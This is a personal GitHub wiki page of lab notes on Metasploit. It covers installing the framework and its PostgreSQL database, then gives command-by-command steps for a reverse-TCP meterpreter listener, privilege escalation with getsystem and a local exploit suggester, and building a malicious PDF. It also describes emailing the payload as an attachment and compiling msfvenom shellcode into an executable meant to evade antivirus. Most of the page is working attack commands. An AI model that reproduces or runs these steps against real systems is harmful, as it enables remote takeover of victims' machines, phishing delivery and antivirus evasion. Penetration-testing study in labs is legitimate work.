Metasploit - jonatello/lab-musing GitHub Wiki

https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/

pkg install metasploit

Install PostgreSQL

pkg install postgresql95-server

Set postgresql to automatically start, initialize the database, and start the service

sysrc postgresql_enable=yes

mkdir /usr/local/pgsql/data

chown pgsql /usr/local/pgsql/data

service postgresql initdb

service postgresql start

Create the postgresql "msf_user" user and "msf_database" database

createuser msf_user -U pgsql -P

createdb msf_database -U pgsql

Launch the Metasploit Framework Console and connect the database

msfconsole

db_connect msf_user@localhost:5432/msf_database

Verify the connection

db_status

Most activity involves creating a payload via msfvenom and then establishing a listener via metasploit for the "victim" device to connect back to when they execute the payload (which includes the host/port to be used).

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LPORT 4444

set LHOST 0.0.0.0

To automatically migrate sessions once established to a new process (hides the CMD prompt and opens a notepad.exe process instead)

set AutoRunScript post/windows/manage/migrate

Finally, start the handler

exploit

Once a meterpreter session has been established, post exploitation modules can be utilized (https://www.offensive-security.com/metasploit-unleashed/post-module-reference/)

Generally you'll want to escalate permissions if possible (if within the meterpreter shell, simply run "getsystem")

sessions -i 1 -C getsystem

If this fails, you'll need to go through the exercise of privilege escalation. Most of these exploits can be found within "exploit/windows/local/". To help find relevant exploits, use Lester (again, if within the meterpreter shell, simply run the actual command)

sessions -i 1 -C run post/multi/recon/local_exploit_suggester

Once an exploit is identified, we can attempt to use it. For example, you can run the following within msfconsole (not meterpreter) to attempt the additional exploit on the session (we'll assume session 1)

use exploit/windows/local/ask

set SESSION 1

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 0.0.0.0

set LPORT 4444

Launch the Metasploit Framework Console

msfconsole

Generate a payload with the LHOST and LPORT variables specifying the IP and port our host will be listening on. The host IP can be a private or public IP address, just keep in mind that if it's public, firewall rules and address translation will need to be accounted for. Replace the IP address and port appropriately.

use exploit/windows/fileformat/adobe_utilprintf

set FILENAME Bad_PDF.pdf

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 10.1.1.10

set LPORT 4444

Verify the options we've set

show options

Generate the actual payload/file

exploit

Now, we set up the multi handler listener. We will use the same LHOST and LPORT parameters to match our payload.

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 10.1.1.10

set LPORT 4444

exploit

Now that our payload has been created and our listener is active, we need to deliver the payload and (hope) it gets executed. One method is to send an email with the payload as an attachment. There are many ways to get this done.

This time we'll use msfvenom to generate our Windows payload using the same host/port as in our previous example. The "-f" flag allows us to specify the format (exe), the "-e" flag lets us specify the specific encoder, and the "-o" flag lets us specify the output to generate (a file called payload.exe)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.10 LPORT=4444 -f exe -e x86/shikata_ga_nai -o payload.exe

Generate the shellcode into raw C

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IPAddress> LPORT=4444 -f c > shell_code.c 2>&1

Cat this file and note the "Payload size" value in bytes as well as "unsigned char buf[] =" value

Create a new file to be used (we'll call it payload.c) and fill with the content from template.metasploit and update the 'unsigned const char payload[] = ""' quotations with the previously noted payload, and the 'size_t size = 0' to the proper payload size in bytes

From a Windows workstation, copy this file down locally

Download and install MinGW in order to compile the code. Once installed, select all of the packages on the "Basic Setup" tab on the left and "Mark for Installation". Next click Installation > Apply Changes > Apply to install these packages.

Edit C:\MinGW\msys\1.0\etc\fstab and verify the line exists "C:\MinGW /mingw"

Open CMD prompt as admin and run the following (assuming we've moved the payload.txt file to C:\temp)

cd C:\MinGW\bin

gcc.exe c:\temp\payload.c -o c:\temp\payload.exe

This new payload.exe file can now be used with a handler and should avoid most AV detection.